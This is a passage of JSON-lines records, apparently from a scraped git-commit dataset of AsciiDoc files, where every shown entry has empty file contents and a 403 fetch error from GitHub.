install\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"cnv\/cnv_install\/preparing-cluster-for-cnv.adoc","new_file":"cnv\/cnv_install\/preparing-cluster-for-cnv.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"290cbbb8b29e254c8b8b72205ea8f5b69c476509","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54380f977c9ec0251e86240f1dee47a4198d54ca","subject":"Update 2016-11-22-Sweet-Potato.adoc","message":"Update 2016-11-22-Sweet-Potato.adoc","repos":"acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io","old_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acristyy\/acristyy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"591ca2350f71687ab24f5eaee0bda920f3c79afb","subject":"Update 2015-06-08-My-title.adoc","message":"Update 2015-06-08-My-title.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-08-My-title.adoc","new_file":"_posts\/2015-06-08-My-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f6a536fb616d45c5f3660b7fa2c9177811b5cab","subject":"Update 2017-01-31-New-blog.adoc","message":"Update 2017-01-31-New-blog.adoc","repos":"Adyrhan\/adyrhan.github.io,Adyrhan\/adyrhan.github.io,Adyrhan\/adyrhan.github.io,Adyrhan\/adyrhan.github.io","old_file":"_posts\/2017-01-31-New-blog.adoc","new_file":"_posts\/2017-01-31-New-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Adyrhan\/adyrhan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86fd6bc9cf151ffbdf020fab5298d598ebc3ea08","subject":"Update 2017-04-06-Cucumber.adoc","message":"Update 2017-04-06-Cucumber.adoc","repos":"ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io","old_file":"_posts\/2017-04-06-Cucumber.adoc","new_file":"_posts\/2017-04-06-Cucumber.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ovo-6\/ovo-6.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"489b863ea753ce70298f43f7bdf426ff0ccecf70","subject":"Update 2015-11-23-Colores-en-tu-terminal.adoc","message":"Update 2015-11-23-Colores-en-tu-terminal.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-23-Colores-en-tu-terminal.adoc","new_file":"_posts\/2015-11-23-Colores-en-tu-terminal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3af45c08bde27ce9a1334f4ca39c067c671844b","subject":"add send mail file","message":"add send mail file\n","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2017-07-18-Send-mail-via-python.adoc","new_file":"_posts\/2017-07-18-Send-mail-via-python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95c37c7931f49525b9c61eaf0fafb6fd35029d0b","subject":"Added History file.","message":"Added History file.\n","repos":"jprichardson\/node-fs-extra,reggi\/node-fs-extra,Narigo\/node-fs-extra,JanMattner\/node-fs-extra,SciSpike\/node-fs-extra,KoryNunn\/node-fs-extra,snuggles08\/node-fs-extra","old_file":"HISTORY.asciidoc","new_file":"HISTORY.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reggi\/node-fs-extra.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dcf3723a3fcd2c00b1ce340f242aa776e4318fd6","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b5468961faf384fd737aa9bb4fce44683924120","subject":"api-management draft","message":"api-management draft\n","repos":"redhat-helloworld-msa\/helloworld-msa","old_file":"api-management.adoc","new_file":"api-management.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-helloworld-msa\/helloworld-msa.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4c30f9e1578348982d5d61ed085b816e1f281b01","subject":"Update 2015-12-06-C-Q-R-S-en-C.adoc","message":"Update 2015-12-06-C-Q-R-S-en-C.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2015-12-06-C-Q-R-S-en-C.adoc","new_file":"_posts\/2015-12-06-C-Q-R-S-en-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80e397eb8ce54e03d6884843d71fcab90f168adf","subject":"Update 2016-01-18-syslog-audit.adoc","message":"Update 2016-01-18-syslog-audit.adoc","repos":"Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io","old_file":"_posts\/2016-01-18-syslog-audit.adoc","new_file":"_posts\/2016-01-18-syslog-audit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cnlouds\/cnlouds.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2270f6c3752cea0cf6154b7d082a7a8e18f5be93","subject":"Update 2019-01-31-Your-Blog-title.adoc","message":"Update 2019-01-31-Your-Blog-title.adoc","repos":"mkent-at-rivermeadow-dot-com\/hubpress.io,mkent-at-rivermeadow-dot-com\/hubpress.io,mkent-at-rivermeadow-dot-com\/hubpress.io,mkent-at-rivermeadow-dot-com\/hubpress.io","old_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkent-at-rivermeadow-dot-com\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c954faf1f66dac551424634886cecf38109d6f8","subject":"Publish 2016-6-27-json-decode-json-encode.adoc","message":"Publish 2016-6-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-json-decode-json-encode.adoc","new_file":"2016-6-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1ad018424686fc3cc99131598bc1d2edb9bf79b","subject":"Delete the file at '2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc'","message":"Delete the file at '2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_file":"2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"333c249dd253c4a48a892800030f8038293f3ffb","subject":"Update 2016-12-23-How-to-partially-match-in-object-array.adoc","message":"Update 2016-12-23-How-to-partially-match-in-object-array.adoc","repos":"xinmeng1\/note,xinmeng1\/note,xinmeng1\/note,xinmeng1\/note","old_file":"_posts\/2016-12-23-How-to-partially-match-in-object-array.adoc","new_file":"_posts\/2016-12-23-How-to-partially-match-in-object-array.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xinmeng1\/note.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b64e23f9da0a2fe4054ee7127c8aed24665a6b48","subject":"INFUND-6393 add adocs","message":"INFUND-6393 add adocs\n\n\nFormer-commit-id: d77d92563958736962312f4cff64334cab3e345d","repos":"InnovateUKGitHub\/innovation-funding-service,InnovateUKGitHub\/innovation-funding-service,InnovateUKGitHub\/innovation-funding-service,InnovateUKGitHub\/innovation-funding-service,InnovateUKGitHub\/innovation-funding-service","old_file":"ifs-data-service\/src\/docs\/asciidoc\/competitionSetupFinance.adoc","new_file":"ifs-data-service\/src\/docs\/asciidoc\/competitionSetupFinance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InnovateUKGitHub\/innovation-funding-service.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"359b0e29153f1906a240aac1d397a2f59390e17e","subject":"Fix typo MySQL and add link","message":"Fix typo MySQL and add link","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44e50b110b099c63b632ba222d806f429c411c69","subject":"Update 2016-03-02-Y-J-Soft-Github.adoc","message":"Update 2016-03-02-Y-J-Soft-Github.adoc","repos":"YJSoft\/yjsoft.github.io,YJSoft\/yjsoft.github.io,YJSoft\/yjsoft.github.io,YJSoft\/yjsoft.github.io","old_file":"_posts\/2016-03-02-Y-J-Soft-Github.adoc","new_file":"_posts\/2016-03-02-Y-J-Soft-Github.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YJSoft\/yjsoft.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34e14896ddb1bd29c44b3188d80ad80d1557d60a","subject":"Update 2017-01-06-ppap-javascript.adoc","message":"Update 2017-01-06-ppap-javascript.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-06-ppap-javascript.adoc","new_file":"_posts\/2017-01-06-ppap-javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7efc180e6c053c06ea29858edc2dea3eb9c46305","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ca5240905585fd5d50ad7dd07d1b3b1250ae3d0","subject":"commit","message":"commit\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"spring\/demo-retry\/readme.adoc","new_file":"spring\/demo-retry\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6544b960813aed5206da24962257f5072290417b","subject":"Update 2016-7-8.adoc","message":"Update 2016-7-8.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-8.adoc","new_file":"_posts\/2016-7-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e6b0896c105a76923787cddf456ce977528f46d","subject":"Update 2016-03-18-Hacking-Health-Camp-2016.adoc","message":"Update 2016-03-18-Hacking-Health-Camp-2016.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2016-03-18-Hacking-Health-Camp-2016.adoc","new_file":"_posts\/2016-03-18-Hacking-Health-Camp-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80291bccc5d3bc94334edbbd605477e8b52a8652","subject":"Update 2016-11-09-231100-Wednesday-Evening.adoc","message":"Update 2016-11-09-231100-Wednesday-Evening.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-09-231100-Wednesday-Evening.adoc","new_file":"_posts\/2016-11-09-231100-Wednesday-Evening.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e35f51a41df86705959716ffc2ba2ca91bd202d","subject":"y2b create post Little Big Planet 2 Collector's Edition Unboxing \\u0026 Overview in HD!","message":"y2b create post Little Big Planet 2 Collector's Edition Unboxing \\u0026 Overview in HD!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-18-Little-Big-Planet-2-Collectors-Edition-Unboxing-u0026-Overview-in-HD.adoc","new_file":"_posts\/2011-01-18-Little-Big-Planet-2-Collectors-Edition-Unboxing-u0026-Overview-in-HD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59ce6655652f110a8b01c4399b966f5fb58ae720","subject":"y2b create post Sega Genesis Unboxing","message":"y2b create post Sega Genesis Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-08-Sega-Genesis-Unboxing.adoc","new_file":"_posts\/2014-06-08-Sega-Genesis-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca2ea9117d8a557ac518e74a28c57eea06f4e57a","subject":"Update 2017-08-10-Episode-109-Work-Work.adoc","message":"Update 2017-08-10-Episode-109-Work-Work.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-08-10-Episode-109-Work-Work.adoc","new_file":"_posts\/2017-08-10-Episode-109-Work-Work.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97e486a1e9c7f5a74f1ba762905b6c05e83240d5","subject":"Added failover load balancing EIP docs","message":"Added failover load balancing EIP docs\n","repos":"tadayosi\/camel,DariusX\/camel,tadayosi\/camel,jonmcewen\/camel,pax95\/camel,adessaigne\/camel,christophd\/camel,pax95\/camel,jamesnetherton\/camel,gautric\/camel,tdiesler\/camel,gautric\/camel,sverkera\/camel,ullgren\/camel,sverkera\/camel,nicolaferraro\/camel,zregvart\/camel,nikhilvibhav\/camel,tdiesler\/camel,onders86\/camel,tadayosi\/camel,cunningt\/camel,onders86\/camel,snurmine\/camel,jonmcewen\/camel,rmarting\/camel,jamesnetherton\/camel,dmvolod\/camel,apache\/camel,pax95\/camel,curso007\/camel,jonmcewen\/camel,onders86\/camel,punkhorn\/camel-upstream,dmvolod\/camel,gnodet\/camel,mcollovati\/camel,kevinearls\/camel,zregvart\/camel,sverkera\/camel,pmoerenhout\/camel,DariusX\/camel,apache\/camel,punkhorn\/camel-upstream,apache\/camel,gnodet\/camel,davidkarlsen\/camel,kevinearls\/camel,rmarting\/camel,pmoerenhout\/camel,jamesnetherton\/camel,apache\/camel,tadayosi\/camel,snurmine\/camel,dmvolod\/camel,Fabryprog\/camel,jonmcewen\/camel,jamesnetherton\/camel,mcollovati\/camel,gautric\/camel,nicolaferraro\/camel,rmarting\/camel,objectiser\/camel,mcollovati\/camel,kevinearls\/camel,gnodet\/camel,tdiesler\/camel,nikhilvibhav\/camel,objectiser\/camel,zregvart\/camel,alvinkwekel\/camel,kevinearls\/camel,snurmine\/camel,akhettar\/camel,snurmine\/camel,pmoerenhout\/camel,snurmine\/camel,onders86\/camel,curso007\/camel,sverkera\/camel,Fabryprog\/camel,tadayosi\/camel,jonmcewen\/camel,pax95\/camel,tdiesler\/camel,apache\/camel,adessaigne\/camel,akhettar\/camel,tdiesler\/camel,christophd\/camel,jamesnetherton\/camel,dmvolod\/camel,nikhilvibhav\/camel,onders86\/camel,objectiser\/camel,rmarting\/camel,anoordover\/camel,Fabryprog\/camel,christophd\/camel,akhettar\/camel,CodeSmell\/camel,kevinearls\/camel,pmoerenhout\/camel,davidkarlsen\/camel,adessaigne\/camel,anoordover\/camel,kevinearls\/camel,onders86\/camel,CodeSmell\/camel,mcollovati\/camel,gnodet\/camel,nicolaferraro\/camel,adessaigne\/camel,apache\/camel,ullgren\/camel,jonmcewen\/camel,adessaigne\/camel,anoordover\/camel,tdiesler\/camel,dmvolod\/camel,anoordover\/camel,punkhorn\/camel-upstream,gautric\/camel,rmarting\/camel,snurmine\/camel,tadayosi\/camel,cunningt\/camel,davidkarlsen\/camel,christophd\/camel,curso007\/camel,alvinkwekel\/camel,alvinkwekel\/camel,CodeSmell\/camel,cunningt\/camel,zregvart\/camel,DariusX\/camel,gnodet\/camel,pmoerenhout\/camel,curso007\/camel,curso007\/camel,nikhilvibhav\/camel,cunningt\/camel,jamesnetherton\/camel,gautric\/camel,christophd\/camel,anoordover\/camel,pax95\/camel,davidkarlsen\/camel,nicolaferraro\/camel,anoordover\/camel,sverkera\/camel,dmvolod\/camel,adessaigne\/camel,alvinkwekel\/camel,ullgren\/camel,ullgren\/camel,pmoerenhout\/camel,CodeSmell\/camel,objectiser\/camel,akhettar\/camel,akhettar\/camel,rmarting\/camel,gautric\/camel,sverkera\/camel,punkhorn\/camel-upstream,DariusX\/camel,christophd\/camel,cunningt\/camel,akhettar\/camel,Fabryprog\/camel,pax95\/camel,curso007\/camel,cunningt\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/failover-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/failover-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"311a0d9ed16b61350cb690451ed4fa37ec1ee0ad","subject":"Set numbered attribute on documentation.","message":"Set numbered attribute on documentation.\n","repos":"Stranger6667\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81e66d3bc91b79d42b51c369ab86416fcd21954c","subject":"Update 2015-09-18-HSBCs-Revolution-Programme.adoc","message":"Update 2015-09-18-HSBCs-Revolution-Programme.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-18-HSBCs-Revolution-Programme.adoc","new_file":"_posts\/2015-09-18-HSBCs-Revolution-Programme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a984da7b1d6df944dd15c993bb83c3c678e7b661","subject":"Update 2018-10-15-Docker-N-E-M-A-P-I-Account.adoc","message":"Update 2018-10-15-Docker-N-E-M-A-P-I-Account.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-Docker-N-E-M-A-P-I-Account.adoc","new_file":"_posts\/2018-10-15-Docker-N-E-M-A-P-I-Account.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c48283e034adb89737ef6d2545d819e6df96a690","subject":"new lab 2","message":"new lab 2\n","repos":"dm-academy\/aitm-labs,dm-academy\/aitm-labs,dm-academy\/aitm-labs","old_file":"Lab-02\/02-tech-lab-v2.adoc","new_file":"Lab-02\/02-tech-lab-v2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dm-academy\/aitm-labs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c8c37c1e6e277e0179e45996c4db87c2a6b017f","subject":"Fixed minor typo in docs","message":"Fixed minor typo in docs\n\nopip > pip","repos":"Stranger6667\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb5a8be8f900a5acb6f99cee59144b82695ea1aa","subject":"Update 2016-11-10-Angulartics-rewrite-with-Angular-2-support.adoc","message":"Update 2016-11-10-Angulartics-rewrite-with-Angular-2-support.adoc","repos":"timelf123\/timelf123.github.io,timelf123\/timelf123.github.io,timelf123\/timelf123.github.io,timelf123\/timelf123.github.io","old_file":"_posts\/2016-11-10-Angulartics-rewrite-with-Angular-2-support.adoc","new_file":"_posts\/2016-11-10-Angulartics-rewrite-with-Angular-2-support.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/timelf123\/timelf123.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f8bf15e00d4dc061562ffc58efdf87366f67e7a","subject":"Update 2015-05-14-bla.adoc","message":"Update 2015-05-14-bla.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-bla.adoc","new_file":"_posts\/2015-05-14-bla.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"460bf7a04cc517a9523a571dc53a911a85a65ab8","subject":"Delete 2015-10-01-Neu.adoc","message":"Delete 2015-10-01-Neu.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-10-01-Neu.adoc","new_file":"_posts\/2015-10-01-Neu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0718a2f5462e6ebfb742d9a562d0468bc4134e2e","subject":"Update 2018-10-15-Firebase-Firestore.adoc","message":"Update 2018-10-15-Firebase-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"895d2b0a500e0f86c6ed15468ef420d2d73f8d6d","subject":"adding release notes for BVal-1.1.0","message":"adding release notes for BVal-1.1.0\n\n","repos":"dblevins\/bval,apache\/bval","old_file":"RELEASE-NOTES.adoc","new_file":"RELEASE-NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dblevins\/bval.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec09e4b56e08876ae7667839ce6efbe2333c97c2","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af35e320becfeae19734ba4b491b35ac1d848a67","subject":"Corrected path","message":"Corrected path\n\nAdded helloworld to path in cd to 